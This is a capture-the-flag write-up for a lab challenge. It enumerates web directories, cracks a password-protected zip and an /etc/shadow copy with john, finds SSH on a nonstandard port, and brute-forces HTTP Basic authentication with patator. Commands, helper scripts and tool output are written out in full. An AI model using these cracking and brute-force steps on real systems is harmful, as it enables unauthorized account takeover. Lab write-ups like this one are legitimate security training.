Multi Brute (silver, 100p)

The target has an encrypted zip archive containing a user's password hash.

http://10.XX.32.134

Get the flag from unauthenticated user's /home folder.

Solution

The web page is a simple template with nothing useful on it.

A simple gobuster web enumeration turns up several directories:

# gobuster dir -u http://10.XX.32.134 -w /usr/share/seclists/Discovery/Web-Content/common.txt

(..)

/.hta (Status: 403) [Size: 277]

/.htaccess (Status: 403) [Size: 277]

/.htpasswd (Status: 403) [Size: 277]

/admin (Status: 401) [Size: 459]

/back-up (Status: 301) [Size: 314] [--> http://10.XX.32.134/back-up/]

/backup (Status: 401) [Size: 459]

/index.html (Status: 200) [Size: 5804]

/robots.txt (Status: 200) [Size: 675]

/server-status (Status: 403) [Size: 277]



/style (Status: 301) [Size: 312] [--> http://10.XX.32.134/style/]Directory /back-up contains directory index with a file etc.zip.

The zip file is password-protected, but it is easily cracked with zip2john and john; the password is kawasaki.

```
$ zip2john etc.zip 2>/dev/null | tee zip.hash
etc.zip:$pkzip2$3*2*1*0*0*24*21c0*7378*5fc321adea8093c713efe5dd3320c714d4b2fd55733bd70164c0bb8ee869b203e9463a98*1*0*8*24*d5d8*850a*c84e4b038d021040b7c9c54e4643dcd486eb3907db24de98e5a91bd6f4766bb6934ba3f5*2*0*14*8*7d6eaedd*115eda*46*0*14*7d6e*6192*705281af0aefdc0853951eaa20b3a0062db9a41c*$/pkzip2$::etc.zip:etc/timezone, etc/alternatives/pager.1.gz, etc/alternatives/rmt:etc.zip

$ john --wordlist=/usr/share/seclists/Passwords/probable-v2-top12000.txt zip.hash
Loaded 1 password hash (PKZIP [32/64])
kawasaki (etc.zip)
```

The archive contains a copy of /etc. The most interesting file is etc/shadow, since it holds the system users' password hashes.

Those hashes can be cracked with john as well; the password for user web is liverpool.

```
$ unzip etc.zip etc/shadow
Archive: etc.zip
[etc.zip] etc/shadow password:
  inflating: etc/shadow

$ john --wordlist=/usr/share/seclists/Passwords/probable-v2-top12000.txt etc/shadow
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
liverpool (web)
```
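Before running john on a shadow file, a quick look at which accounts actually carry a password hash, and with which scheme, shows what is worth cracking; here john reported sha512crypt, i.e. the `$6$` prefix. A minimal sketch with awk, assuming the standard shadow(5) layout `name:hash:...`; the function name `crackable_accounts` is hypothetical and not part of john:

```bash
#!/usr/bin/env bash
# Print "user $id$" for every account in a shadow(5)-format file whose
# password field is a crypt(3) hash, e.g. "$6$" = sha512crypt, "$y$" = yescrypt.
# Fields that do not start with "$" (locked "!" / "*", or empty) are skipped.
crackable_accounts() {
  local shadow_file="$1"
  awk -F: '
    $2 ~ /^[$]/ {
      # "$6$salt$hash" split on a literal "$" gives parts[2] = "6"
      split($2, parts, "[$]")
      printf "%s $%s$\n", $1, parts[2]
    }' "$shadow_file"
}
```

For example, `crackable_accounts etc/shadow` lists only the accounts worth feeding to john.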

Logging in as a system user requires SSH access, but the default port 22/tcp is closed.

A full TCP port scan with nmap reveals SSH running on port 44322/tcp.

```
$ nmap -Pn -n -sC -sV -p- 10.XX.32.134
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 28 disallowed entries (15 shown)
| /alex.htm /client_intro.htm /clientlist_cat.htm
| /consult.htm /consulting.htm /contact.htm /evals.htm /index.htm
| /jennifer.htm /karen.htm /leni.htm /listofclients.htm /market.htm
|_/news.htm /ongoing.htm
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Slide Light
44322/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:3e:bf:f0:9a:2d:f7:46:75:0c:32:d7:7b:c7:40:df (RSA)
| 256 d5:36:61:da:cb:47:4f:44:27:bb:51:83:14:e1:cc:55 (ECDSA)
|_ 256 cc:bc:60:c1:7b:65:33:27:00:02:ff:9c:b6:a8:c5:e5 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Connecting via SSH as user web with password liverpool gives a shell in web's home directory, where flag.txt holds the flag.

```
$ ssh -p 44322 web@10.XX.32.134
web@10.XX.32.134's password: liverpool
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-123-generic x86_64)

 * Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com
 * Support: https://ubuntu.com/advantage

web@zip:~$ id
uid=1000(web) gid=1000(web) groups=1000(web),27(sudo)
web@zip:~$ ls -al
total 32
drwxr-xr-x 1 web web 4096 Oct 6 11:40 .
drwxr-xr-x 1 root root 4096 Nov 4 2020 ..
-rw-r--r-- 1 web web 220 Sep 1 2015 .bash_logout
-rw-r--r-- 1 web web 3771 Sep 1 2015 .bashrc
-rw-r--r-- 1 web web 655 Jul 12 2019 .profile
-rw-r--r-- 1 root root 50 Sep 29 12:54 flag.txt
web@zip:~$ cat flag.txt
The Flag is: eb351ff8-e011-4198-b627-ff325e2cf321
```

Bonus

In my opinion, finding the /back-up directory straight away was not expected, and the intended path was a bit longer. Let's explore that.

robots.txt is pretty much the first file anyone checks, even without dedicated web enumeration tools; the nmap scan also returned entries from it:

```
User-agent: *
Disallow: /alex.htm
Disallow: /client_intro.htm
Disallow: /clientlist_cat.htm
Disallow: /consult.htm
Disallow: /consulting.htm
Disallow: /contact.htm
Disallow: /evals.htm
Disallow: /index.htm
Disallow: /jennifer.htm
Disallow: /karen.htm
Disallow: /leni.htm
Disallow: /listofclients.htm
Disallow: /market.htm
Disallow: /news.htm
Disallow: /ongoing.htm
Disallow: /organize.htm
Disallow: /planning.htm
Disallow: /products.htm
Disallow: /proposal.htm
Disallow: /qualifications.htm
Disallow: /resource.htm
Disallow: /shelli.htm
Disallow: /sitemap.htm
Disallow: /strategic.htm
Disallow: /what_intro.htm
Disallow: /ztats
Disallow: /will_letter.htm
Disallow: /will.htm
```

Checking those entries, by hand or with a tool, reveals that only /ztats actually exists. An example using gobuster with a wordlist built from robots.txt:

```
$ curl -s http://10.XX.32.134/robots.txt | grep Disallow | cut -d '/' -f 2 > wordlist.txt
$ gobuster dir -u http://10.XX.32.134 -w ./wordlist.txt
/ztats (Status: 301) [Size: 312] [--> http://10.XX.32.134/ztats/]
```
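The `grep | cut` pipeline above is enough for this robots.txt. A slightly more defensive sketch (the function name `robots_to_wordlist` is hypothetical) also strips Windows line endings, tolerates a missing space after `Disallow:`, drops empty or bare `/` entries and removes duplicates:

```bash
#!/usr/bin/env bash
# Read robots.txt on stdin and print one gobuster wordlist entry per
# Disallow line: CRs removed, "Disallow:" prefix and leading "/" stripped,
# empty entries dropped, duplicates removed (output is sorted).
robots_to_wordlist() {
  tr -d '\r' \
    | sed -n 's|^[Dd]isallow:[[:space:]]*/\{0,1\}||p' \
    | sed '/^$/d' \
    | sort -u
}
```

Usage: `curl -s http://10.XX.32.134/robots.txt | robots_to_wordlist > wordlist.txt`, then run gobuster with `-w ./wordlist.txt` as before.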

/ztats hosts a Webalizer usage report.



One of the reports, ztats/usage_201701.html, contains usernames.

I'm not sure how /backup was meant to be found, whether by guessing or by running something like nikto, but it is the next step: it responds with 401, so access requires valid credentials, and the usernames from the report are candidates for them.
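The /backup directory is protected with HTTP Basic authentication (the patator command that follows uses `auth_type=basic`), so each guess is just `user:password`, base64-encoded into an `Authorization` header. A minimal sketch of building that header by hand, e.g. to check a single candidate with curl before a full brute force; the function name `basic_auth_header` is hypothetical:

```bash
#!/usr/bin/env bash
# Build an HTTP Basic "Authorization" header for one user:password pair.
# GNU base64 wraps long output at 76 characters, so newlines are removed
# to keep the header on a single line.
basic_auth_header() {
  local user="$1" pass="$2"
  printf 'Authorization: Basic %s\n' \
    "$(printf '%s:%s' "$user" "$pass" | base64 | tr -d '\n')"
}

# Example (host from this write-up):
#   curl -s -o /dev/null -w '%{http_code}\n' \
#     -H "$(basic_auth_header comcomcom roadrunner)" http://10.XX.32.134/backup
```

curl's own `-u user:password` option sends the same header; building it manually only makes the encoding visible. With valid credentials the request should return 301, like the patator hit, instead of 401.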

Brute-forcing HTTP Basic authentication on /backup with the retrieved usernames reveals valid credentials: username comcomcom with password roadrunner.

```
$ sed -e 's/^/admin:/' /usr/share/seclists/Passwords/probable-v2-top12000.txt > combos.txt
$ sed -e 's/^/comcomcom:/' /usr/share/seclists/Passwords/probable-v2-top12000.txt >> combos.txt
$ patator http_fuzz url=http://10.XX.32.134/backup auth_type=basic user_pass=COMBO00:COMBO01 0=combos.txt -x ignore:code=401
14:43:24 patator INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.9.7
14:43:24 patator INFO -
14:43:24 patator INFO - code size:clen time | candidate | num | mesg
14:43:24 patator INFO - -----------------------------------------------------------------------------
14:43:35 patator INFO - 301 521:313 0.002 | comcomcom:roadrunner | 14964 | HTTP/1.1 301 Moved Permanently
14:43:43 patator INFO - Hits/Done/Skip/Fail/Size: 1/25290/0/0/25290, Avg: 1334 r/s, Time: 0h 0m 18s
```
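The two `sed` commands above generalise to any number of usernames. A minimal sketch (the function and file names are hypothetical) that pairs every username from one file with every password from a wordlist, producing the same `user:password` lines that patator reads as COMBO00 and COMBO01:

```bash
#!/usr/bin/env bash
# Print "user:password" for every username in $1 combined with every
# password in $2, grouped by username (same order as the sed commands above).
make_combos() {
  local users_file="$1" passwords_file="$2" user
  # "|| [ -n "$user" ]" also handles a last line without a trailing newline
  while IFS= read -r user || [ -n "$user" ]; do
    if [ -n "$user" ]; then
      # awk -v avoids escaping "/" or "&" in usernames, as sed would need
      awk -v u="$user" '{ print u ":" $0 }' "$passwords_file"
    fi
  done < "$users_file"
}
```

Usage: `make_combos users.txt /usr/share/seclists/Passwords/probable-v2-top12000.txt > combos.txt`. Note that awk still interprets backslash escapes in `-v` values, which does not matter for plain usernames like these.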



Directory /backup has a directory index containing the file backup.sh.

The script references the back-up directory, including the etc.zip archive found earlier, and that was probably the intended path:

```bash
#!/bin/bash
/usr/bin/mysqldump -uweb -pnagamatsu web > /var/www/html/back-up/web.sql
/usr/bin/zip /var/www/html/back-up/web.sql.zip /var/www/html/back-up/web.sql
/bin/rm /var/www/html/back-up/web.sql
/usr/bin/local/backup-www.sh /var/www/html/* -o /var/www/html/back-up/html.zip
/usr/bin/local/backup-www.sh /etc/* -o /var/www/html/back-up/etc.zip
```